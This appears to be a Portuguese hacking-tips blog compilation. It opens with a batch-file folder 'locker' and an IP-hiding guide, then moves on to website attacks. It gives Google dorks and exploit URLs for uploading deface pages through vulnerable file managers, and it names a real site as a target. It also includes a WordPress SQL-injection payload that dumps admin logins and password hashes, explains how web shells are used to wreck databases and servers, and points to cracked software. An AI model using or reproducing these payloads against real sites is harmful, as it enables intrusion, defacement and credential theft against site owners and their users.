Como colocar senhas em pastas do Windows

Passo 1. Crie uma nova pasta no seu computador, em qualquer diretório, com o nome que desejar, para armazenar os arquivos:
Passo 2. Abra o aplicativo “Bloco de notas” no seu computador;
Passo 3. Insira este texto:

CLS
@ECHO OFF
title Folder Private
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Tem certeza de que deseja bloquear a pasta (Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Digite a senha para desbloquear a pasta
set/p “pass=>”
if NOT %pass%== digite aqui a sua senha  goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Senha Inválida
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
Passo 4. No texto em negrito do passo anterior, substitua o termo “digite aqui a sua senha”, por uma senha para proteger sua pasta;
Passo 5. Em seguida, clique em “Arquivo” no menu principal e depois em “Salvar”. Salve este arquivo com o nome “locker.bat”
Passo 6. Coloque o arquivo no mesmo local onde está a pasta criada no passo 1. Depois altere o tipo de documento para “Todos os arquivos” e clique em “salvar”; 
Passo 7. Em seguida, execute o arquivo “locker.bat” para criação da pasta “Private”; 
Passo 8. Mova todos os documentos que deseja manter em segurança para dentro da pasta “Private”; 
Passo 9. Clique no arquivo “locker.bat” para executá-lo novamente. Digite “Y” e depois dê um "Enter". A pasta “Private” ficará escondida e só poderá ser visualizada após digitar a senha que você inseriu no passo 4; 
Passo 10. Para acessá-la, execute o arquivo “locker.bat”. Digite a senha e clique “Enter”. Quando não for mais utilizar os arquivos, basta repetir o passo 9.

Como esconder o endereço de IP online

Cada computador na Internet tem um endereço IP único atribuído a ele o que torna possível saber sua localização exata. Mesmo que o conceito de endereço Internet Protocol foi projetado por sua transparência e rastreabilidade, em alguns casos, esta violando a privacidade do usuário da Internet. Bem, se você é uma dessas pessoas que está em busca de maneiras de esconder o seu endereço IP, então você está no lugar certo. Neste post, vou mostrar algumas das maneiras fáceis e populares para esconder seu endereço de IP, de modo que sua identidade e privacidade é mantida em segurança.
Uma das formas mais populares e fáceis de esconder o seu endereço IP online é usar um servidor proxy. Em palavras simples, um servidor proxy é qualquer servidor que atuará como um intermediário entre o computador ea Internet. Em vez de se comunicar diretamente com os sites ou recursos da Internet, aqui você se comunica com o servidor proxy que encaminha todos os seus pedidos para o servidor remoto, de modo a estabelecer uma frente e para trás a comunicação entre o seu computador ea Internet. Assim, sempre que você está se escondendo atrás de um proxy, a Internet ou os sites que você visita só vai ver o endereço IP do servidor proxy, de modo que o seu endereço IP real é mantido escondido. Para mais informações sobre servidores de proxy, você pode consultar o meu post anterior sobre o que é um servidor proxy?

Site baseado servidores proxy:

Este é o mais simples de todos os métodos. Existem muitos sites na Internet que oferecem serviço de proxy gratuitos e pagos para os usuários sem ter que instalar qualquer peça de software em seu computador. A seguir estão alguns dos sites populares que oferecem serviço de proxy:
Os sites acima fornecem um campo para digitar a URL do site de destino que você deseja visitar anonimamente. Uma vez que você enviar, eles vão estabelecer uma conexão com o site de destino e apresentar de volta com a página pretende que você está tentando navegar. A desvantagem de usar estes serviços gratuitos é que, alguns deles não vai oferecer uma conexão segura (SSL) e muitas vezes você vai ser apresentado com anúncios irritantes e pop-ups durante a sua navegação.

Navegador configurado servidores proxy:

Há centenas de proxies abertos disponíveis gratuitamente que podem ser encontrados na Internet. Você pode obter o endereço IP de um desses servidores proxy disponíveis livremente e configurar o navegador para começar a usar. No entanto, como eles são abertamente disponível ao público,sua navegação pode ser bem lenta.

Programa baseado servidores proxy:

Um servidor proxy baseado programa exige que você instalar um programa no seu computador e configure como quiser as definições. Eles tem a opção para começar a esconder o seu endereço IP com apenas um clique de um botão. Eles se conectam automaticamente o computador a um servidor proxy anônimo em alta velocidade privada para fornecer melhor desempenho. Você também tem a opção de escolher proxies baseados em localização, como os países. A vantagem da utilização deste tipo de proxy é que, não se limita a um único navegador. Isso significa que, todo o tráfego web de seu computador é encaminhado através do proxy, garantindo um maior nível de privacidade.
A maioria destes programas vêm com uma versão de avaliação gratuita, onde você é obrigado a pagar uma vez que o período de avaliação expirar. A seguir, são alguns dos programas mais populares da web proxies baseados:
[Mais tem varias versões cracked na internet, basta apénas procurar] 

Serviços de VPN:

Serviços de VPN fornecem maneiras confiáveis ​​não só para esconder o seu endereço IP, mas também para proteger seus dados e identidade através da Internet. Aqui estão alguns exemplos de serviços de VPN que você pode tentar:

EzFilemanager Deface Upload

Dork para EzFilemanager é "inurl:ezfilemanager/ezfilemanager.php"
(Você pode modificar esse dork para obter mais resultados no google)
Exploit: http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Ir para este URL:  website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php e colocar ?sa=1&type=file depois da URL
agora url será: http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Agora ver a opção de upload e você pode fazer o upload, html, pdf, ppt, txt, doc, rtf, xml, xsl, DTD, zip, rar, jpg, png

Hack sites usando RTE webwiz Vulnerabilidade

Primeiro procure o Dork Dork para esta vulnerabilidade é "inurl:rte/my_documents/my_files"
O Exploit é site.com/rte/RTE_popup_file_atch.asp
site.com/admin/RTE_popup_file_atch.asp
Por exemplo, eu encontrei um site que é vulnerável a RTE Site: http://www.billkonigsberg.com Vulnerabilidade http://www.billkonigsberg.com/RTE_popup_file_atch.asp Agora é so carregar a página deface no site, depois de carregar a sua página.
Obs: Procure outra pagina pois está ja não está mais vulneravel

O que é a SHELL e como usar?

Depois de obter o acesso de administrador no site que quer HACKED irá carregar seu próprio controle de painel que é chamado de shell. Ele ajuda a manter o acesso no site por um longo tempo. Existem muitos tipos de Shell como DDOSE, symlink etc ...
Usando shell você pode destruir banco de dados inteiro e ele pode passar o banco de dados do site, e usando a shell ele pode danifica a raiz do servidor. (Windows server Somente servidor Linux pode ser imuni pois não pode ser porque não usa ROOT) Depois de infectado ele pode destruir todo servidor. Suponha que um servidor contém 500 sites e atacante conseguiu o acesso de administrador no único site e ele tem suas raízes nesse servidor, nesse caso os 500 sites pode ser destruído

Onde usa uma shell?

1 Usando shell você pode destruir a página de índice do site
2 Você pode hospedar seus arquivos no servidor
3 Você pode dar root no servidor

Agora, se você quer destruir a página de índice do site, então encontrar a página "index" da lista e substituir esse código com a sua própria página deface. E usando a opção de browse, você pode hospedar seu próprio arquivo no servidor. Você pode criar seu próprio shell e você pode adicionar suas próprias ferramentas em seu shell. para que você saiba PHP.

Hack Blog/WordPress forma facil

Essa forma e antiga, mais em alguns sites funciona!. 1. Abra o Google e pesquisar inurl:"fbconnect_action=myhome"
2. Agora, abra qualquer link abaixo.
3. Depois de abrir o link basta alterar essa parte da ?fbconnect_action=myhome&userid= com este aqui:
 
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z​0mbyak,7,8,9,10,11,12+from+wp_users--

Depois disso é só apertar enter você verá o ID do administrador e a hash.
Agora só descriptografar o hash md5 com Cracker.
 

WordPress File Upload com Asset Manager

No WordPress podemos fazer upload de nossa página deface usando Remote File Upload. 
 Asset Manager é um plugin que permite que você faça o upload de seus arquivos Simplesmente siga os passos simples para hack o wordpress. 1. Abra o Google e pesquisar inurl:Editor/assetmanager/assetmanager.asp 2. Agora, abra qualquer resultado vai aparecer logo a baixo. 3. Basta clicar em procurar e enviar sua página deface.

Ferramenta de sintaxe Maxsqli

Esta ferramenta ajuda a hackers / pentesters para criar sintaxe SQL. E também ajudar no método WAF injeção de bypass sql. 
DownloadScanner

Sql Poizon - Ferramenta sqli Exploit Scanner

Ferramenta Sql Poizon inclui php, asp, RFI, LFI dorks usando essa ferramentas você pode encontrar sites vulneráveis ​​como sites vulneráveis de ​​sql e você também pode encontrar sites vulneráveis ​​por país e você pode hackear sites de sql vulneráveis ​​utilizando a ferramenta Sql Poizon e você também pode navegar no sites usando esta ferramenta.
 
Você pode ver acima como ele vai encontrar os locais vulneráveis de ​​sql.
DownloadScanner

Como configurar seu próprio LAB para injeção de SQL e XSS

Vou mostrar como configurar seu próprio lab de segurança para obter mais prática e tornar mais experiente no sql injection . 1. Baixe Servidor xampp 2. Agora instale o servidor xampp (Ele ira demorar +- 10 min. Durante o processo de instalação.) 3. Agora faça o download Damn Vulnerable Web Application 4. Extraia o arquivo rar na area de trabalho 5 Agora, abra o XAMMP e iniciar todos os serviços
6. Agora vá para C:\xampp\htdocs e deletar todas as pastas e cole nossa pasta dvwa lá. 7. E basta abrir o Firefox ou o Google Chrome e digite "local host" na barra de endereços e clique em dvwa (ID e senha padrão do dvwa é admin e a senha).
Utilizando o aplicativo de Damn Vulnerable Web Application você pode aprender muitas outras coisas também, como XSS, File Inclusion, ataque CSRF.Brute Force, execução de comando e muito mais coisas. Você também pode alterar os níveis de segurança de alta, média e baixa.

Como ver senhas escondidas atrás dos asteriscos

Neste tutorial eu vou mostrar como ver as senhas escondidas atrás dos asteriscos, então vamos supor que você esqueceu a senha da sua conta do Facebook e esta salva no navegador que  você pretende abrir sua conta.
Se você estiver usando o Chrome ou o Mozilla Firefox, então você pode obter as senhas escondidas atrás dos asteriscos, basta clicar onde e o E-mail que vai preencher automatico normalmente. 
Então basta abrir qualquer página de login, onde a senha é salva que você deseja obter a senha.
Agora é só selecionar a senha e clique no botão direito e depois ir para inspecionar elemento.
 Agora ele vai abrir o código-fonte da página e vai tar uma linha em azul.
Agora é só mudar o tipo de senha em texto e em seguida, mude de "password" para "text" . E pressionar Enter.
Ficara assim
Agora basta olhar na tela de login que ira aparecer sua senha

Como criar um pendrive bootável de kali Linux

Vou mostrar como criar um pendrive bootável de kali Linux. Você pode baixa-lo Aqui kali Linux . Foi projetado para os pesquisadores de segurança e pentesters e tem tantas ferramentas embutidas. Agora, para criar um pendrive bootável de kali Linux precisamos Universal USB Installer , utilizando ele podemos instalar qualquer sistema operacional Linux com muita facilidade. Baixar Universal USB Installer e depois simplesmente plugar o seu pendrive e abra o Universal USB Installer e, em seguida, escolher a sua distribuição Linux e localizar usando o botão Browse e clique em Create.
 Depois disso, uma janela irá aparecer e ele vai extrair todos os arquivos para o pendrive e depois é apenas reiniciar o computador e inicializar kali Linux a partir do seu pendrive.